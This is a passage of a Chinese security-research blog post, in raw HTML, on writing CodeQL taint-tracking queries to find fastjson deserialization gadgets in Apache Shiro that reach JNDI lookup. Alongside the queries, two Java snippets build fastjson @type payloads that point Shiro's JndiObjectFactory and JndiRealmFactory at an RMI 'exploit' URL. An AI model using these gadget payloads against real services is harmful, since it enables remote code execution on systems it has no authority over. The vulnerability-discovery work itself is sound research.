MyTaintTrackingConfiguration extends TaintTracking::Configuration &#123;</span><br><span class="line">  MyTaintTrackingConfiguration() &#123; this = "MyTaintTrackingConfiguration" &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSource(DataFlow::Node source) &#123;</span><br><span class="line">    exists(FieldAccess fac|</span><br><span class="line">    source.asExpr() = fac</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSink(DataFlow::Node sink) &#123;</span><br><span class="line">    exists(MethodAccess <span class="keyword">call</span> |</span><br><span class="line">    call.getMethod() instanceof JNDIMethod <span class="keyword">and</span> sink.asExpr() = call.getArgument(<span class="number">0</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span>  MyTaintTrackingConfiguration config, DataFlow::Node <span class="keyword">source</span>, DataFlow::Node sink</span><br><span class="line"><span class="keyword">where</span> config.hasFlow(<span class="keyword">source</span>, sink)</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">source</span>, sink</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516120037602.png" alt="image-20200516120037602"></p>
<p>能查出来，但是没有显示具体的path，后来查看文档，应该是可以显示path的。</p>
<blockquote>
<h2 id="Running-path-queries-in-VS-Code"><a href="#Running-path-queries-in-VS-Code" class="headerlink" title="Running path queries in VS Code"></a>Running path queries in VS Code</h2><ol>
<li>Open a path query in the editor.</li>
<li>Right-click in the query window and select <strong>CodeQL: Run Query</strong>. (Alternatively, run the command from the Command Palette.)</li>
<li>Once the query has finished running, you can see the results in the Results view as usual (under <code>alerts</code> in the dropdown menu). Each query result describes the flow of information between a source and a sink.</li>
<li>Expand the result to see the individual steps that the data follows.</li>
<li>Click each step to jump to it in the source code and investigate the problem further.</li>
<li>To navigate the path from your keyboard, you can bind shortcuts to the <strong>CodeQL: Show Previous Step on Path</strong> and <strong>CodeQL: Show Next Step on Path</strong> commands.</li>
</ol>
</blockquote>
<p>后来根据<a href="https://github.com/github/codeql/blob/master/java/ql/src/Security/CWE/CWE-079/XSS.ql" target="_blank" rel="noopener">https://github.com/github/codeql/blob/master/java/ql/src/Security/CWE/CWE-079/XSS.ql</a> 这个抄了一下。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line">import semmle.code.java.dataflow.FlowSources</span><br><span class="line">import semmle.code.java.dataflow.TaintTracking2</span><br><span class="line">import DataFlow2::PathGraph</span><br><span class="line"></span><br><span class="line">class JNDIMethod extends Method&#123;</span><br><span class="line">    JNDIMethod()&#123;</span><br><span class="line">        this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and</span><br><span class="line">        this.hasName("lookup")</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class MyTaintTrackingConfiguration extends TaintTracking2::Configuration &#123;</span><br><span class="line">  MyTaintTrackingConfiguration() &#123; this = "MyTaintTrackingConfiguration" &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSource(DataFlow::Node source) &#123;</span><br><span class="line">    exists(FieldAccess fac|</span><br><span class="line">    source.asExpr() = fac</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSink(DataFlow::Node sink) &#123;</span><br><span class="line">    exists(MethodAccess <span class="keyword">call</span> |</span><br><span class="line">    call.getMethod() instanceof JNDIMethod <span class="keyword">and</span> sink.asExpr() = call.getArgument(<span class="number">0</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span>  MyTaintTrackingConfiguration config, DataFlow2::PathNode <span class="keyword">source</span>, DataFlow2::PathNode sink</span><br><span class="line"><span class="keyword">where</span> config.hasFlowPath(<span class="keyword">source</span>, sink)</span><br><span class="line"><span class="keyword">select</span> sink.getNode(), <span class="keyword">source</span>, sink, source.getNode()</span><br></pre></td></tr></table></figure>
<p>下拉菜单里面<code>nodes</code> 和 <code>edge</code> 但是没有他说的<code>alerts</code>。</p>
<p>后来查了<del>一下</del> 几下，查到了这个<a href="https://help.semmle.com/lgtm-enterprise/user/help/writing-custom-queries.html" target="_blank" rel="noopener">https://help.semmle.com/lgtm-enterprise/user/help/writing-custom-queries.html</a> 在注释里面加一个metadata 就行了。（其实上面的xss.ql里面也写了，以为注释不用抄）</p>
<p>最终代码变成了这样。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">@kind path-problem</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line">import java</span><br><span class="line">import semmle.code.java.dataflow.FlowSources</span><br><span class="line">import semmle.code.java.dataflow.TaintTracking2</span><br><span class="line">import DataFlow2::PathGraph</span><br><span class="line"></span><br><span class="line">class JNDIMethod extends Method&#123;</span><br><span class="line">    JNDIMethod()&#123;</span><br><span class="line">        this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and</span><br><span class="line">        this.hasName("lookup")</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class MyTaintTrackingConfiguration extends TaintTracking2::Configuration &#123;</span><br><span class="line">  MyTaintTrackingConfiguration() &#123; this = "MyTaintTrackingConfiguration" &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSource(DataFlow::Node source) &#123;</span><br><span class="line">    exists(FieldAccess fac|</span><br><span class="line">    source.asExpr() = fac</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSink(DataFlow::Node sink) &#123;</span><br><span class="line">    exists(MethodAccess <span class="keyword">call</span> |</span><br><span class="line">    call.getMethod() instanceof JNDIMethod <span class="keyword">and</span> sink.asExpr() = call.getArgument(<span class="number">0</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span>  MyTaintTrackingConfiguration config, DataFlow2::PathNode <span class="keyword">source</span>, DataFlow2::PathNode sink</span><br><span class="line"><span class="keyword">where</span> config.hasFlowPath(<span class="keyword">source</span>, sink)</span><br><span class="line"><span class="keyword">select</span> source.getNode(), <span class="keyword">source</span>, sink, sink.getNode()</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516123405926.png" alt="image-20200516123405926"></p>
<p>通过人工检查这些路径，第一个属于误报，第二个三属于不同的分支，可利用，第四也可利用。</p>
<p>第一个是属于误报</p>
<p>分析认为<code>org.apache.shiro.jndi.JndiLocator</code> 的<code>CONTAINER_PREFIX</code> <code>Field</code> 也会通过<code>convertJndiName</code> 的调用传播到<code>lookup</code> 那里</p>
<p>第二个和第三个属于同一个，分别if，else分支里</p>
<p><code>org.apache.shiro.jndi.JndiObjectFactory</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">String input = <span class="string">"&#123;\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\", \"resourceName\":\"rmi://127.0.0.1:9050/exploit\"&#125;"</span>;</span><br><span class="line">Object obj = JSON.parseObject(input);</span><br></pre></td></tr></table></figure>
<p>第四个</p>
<p><code>org.apache.shiro.realm.jndi.JndiRealmFactory</code> </p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">String input = <span class="string">"&#123;\"@type\":\"org.apache.shiro.realm.jndi.JndiRealmFactory\", \"jndiNames\":\"rmi://127.0.0.1:9050/exploit\"&#125;"</span>;</span><br><span class="line">Object obj = JSON.parseObject(input);</span><br></pre></td></tr></table></figure>
<p>可以看到成功的发起了RMI请求</p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516145514480.png" alt="image-20200516145514480"></p>
<p>怎么减少误报呢？</p>
<p><code>FieldAccess</code>要从一个<code>setXXX</code>或者<code>getXXX</code> 流到 <code>lookup</code>。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">@kind path-problem</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line">import java</span><br><span class="line">import semmle.code.java.dataflow.FlowSources</span><br><span class="line">import semmle.code.java.dataflow.TaintTracking2</span><br><span class="line">import DataFlow2::PathGraph</span><br><span class="line"></span><br><span class="line">class JNDIMethod extends Method&#123;</span><br><span class="line">    JNDIMethod()&#123;</span><br><span class="line">        this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and</span><br><span class="line">        this.hasName("lookup")</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class MyTaintTrackingConfiguration extends TaintTracking2::Configuration &#123;</span><br><span class="line">  MyTaintTrackingConfiguration() &#123; this = "MyTaintTrackingConfiguration" &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSource(DataFlow::Node source) &#123;</span><br><span class="line">    exists(FieldAccess fac | </span><br><span class="line">    (fac.getSite().getName().indexOf("get")=0 or fac.getSite().getName().indexOf("<span class="keyword">set</span><span class="string">")=0) and source.asExpr() = fac</span></span><br><span class="line"><span class="string">    )</span></span><br><span class="line"><span class="string">  &#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  override predicate isSink(DataFlow::Node sink) &#123;</span></span><br><span class="line"><span class="string">    exists(MethodAccess call |</span></span><br><span class="line"><span class="string">    call.getMethod() instanceof JNDIMethod and sink.asExpr() = call.getArgument(0)</span></span><br><span class="line"><span class="string">    )</span></span><br><span class="line"><span class="string">  &#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">from  MyTaintTrackingConfiguration config, DataFlow2::PathNode source, DataFlow2::PathNode sink</span></span><br><span class="line"><span class="string">where config.hasFlowPath(source, sink)</span></span><br><span class="line"><span class="string">select source.getNode(), source, sink, sink.getNode()</span></span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516153812978.png" alt="image-20200516153812978"></p>
<p>这样就会排除第一个误报。</p>
<h3 id="common-configuration"><a href="#common-configuration" class="headerlink" title="common-configuration"></a>common-configuration</h3><p><code>common-configuration</code> 的结果如下</p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516154142273.png" alt="image-20200516154142273"></p>
<p>从上面可以看到效果和那位老哥的基本差不多，而且直接给出了具体的数据流。</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><ul>
<li><p>workshop <a href="https://github.com/githubsatelliteworkshops/codeql/" target="_blank" rel="noopener">https://github.com/githubsatelliteworkshops/codeql/</a></p>
</li>
<li><p>Codeql java api 手册 <a href="https://help.semmle.com/qldoc/java/index.html" target="_blank" rel="noopener">https://help.semmle.com/qldoc/java/index.html</a></p>
</li>
<li><p>QL 语法手册 <a href="https://help.semmle.com/QL/ql-handbook/expressions.html" target="_blank" rel="noopener">https://help.semmle.com/QL/ql-handbook/expressions.html</a></p>
</li>
<li><p><a href="https://xz.aliyun.com/t/7482" target="_blank" rel="noopener">https://xz.aliyun.com/t/7482</a></p>
</li>
<li><a href="https://github.com/github/codeql" target="_blank" rel="noopener">https://github.com/github/codeql</a></li>
</ul>

    </div>

    
    
    
        
      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/codeql/" rel="tag"># codeql</a>
            
              <a href="/tags/java/" rel="tag"># java</a>
            
              <a href="/tags/code-static-analysis/" rel="tag"># code-static-analysis</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2020/05/16/twig3.x-with-symfony-ssti/" rel="next" title="TWIG 3.x with symfony  SSTI">
                  <i class="fa fa-chevron-left"></i> TWIG 3.x with symfony  SSTI
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2020/05/20/01knapsack-problem/" rel="prev" title="01knapsack-problem">
                  01knapsack-problem <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Workshop-学习"><span class="nav-number">1.</span> <span class="nav-text">Workshop 学习</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Method"><span class="nav-number">1.1.</span> <span class="nav-text">Method</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#根据Method-name查询"><span class="nav-number">1.1.1.</span> <span class="nav-text">根据Method name查询</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#根据Method-name-和-class-name-查询"><span class="nav-number">1.1.2.</span> <span class="nav-text">根据Method name 和 class name 查询</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#根据Method-name-和-interface-name-查询"><span class="nav-number">1.1.3.</span> <span class="nav-text">根据Method name 和 interface name 查询</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取Method的parameter"><span class="nav-number">1.1.4.</span> <span class="nav-text">获取Method的parameter</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MethodAccess"><span class="nav-number">1.2.</span> <span class="nav-text">MethodAccess</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#获取MethodAccess-的-argument"><span class="nav-number">1.2.1.</span> <span class="nav-text">获取MethodAccess 的 argument</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dataflow"><span class="nav-number">1.3.</span> <span class="nav-text">dataflow</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#exists"><span class="nav-number">1.3.1.</span> <span class="nav-text">exists</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小试牛刀-codeql-找fastjson-反序列化链"><span class="nav-number">2.</span> <span class="nav-text">小试牛刀 - codeql 找fastjson 反序列化链</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#shrio"><span class="nav-number">2.1.</span> <span class="nav-text">shrio</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Running-path-queries-in-VS-Code"><span class="nav-number">3.</span> <span class="nav-text">Running path queries in VS Code</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#common-configuration"><span class="nav-number">3.1.</span> <span class="nav-text">common-configuration</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考链接"><span class="nav-number">4.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">yxxx</p>
  <div class="site-description" itemprop="description"></div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives">
        
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">categories</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">tags</span>
        </a>
      </div>
    
  </nav>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">yxxx</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.9.0</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.4.0</div>

        












        
      </div>
    </footer>
  </div>

  


  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.0"></script><script src="/js/motion.js?v=7.4.0"></script>
<script src="/js/schemes/pisces.js?v=7.4.0"></script>

<script src="/js/next-boot.js?v=7.4.0"></script>



  





















  

  

  

  

</body>
</html>
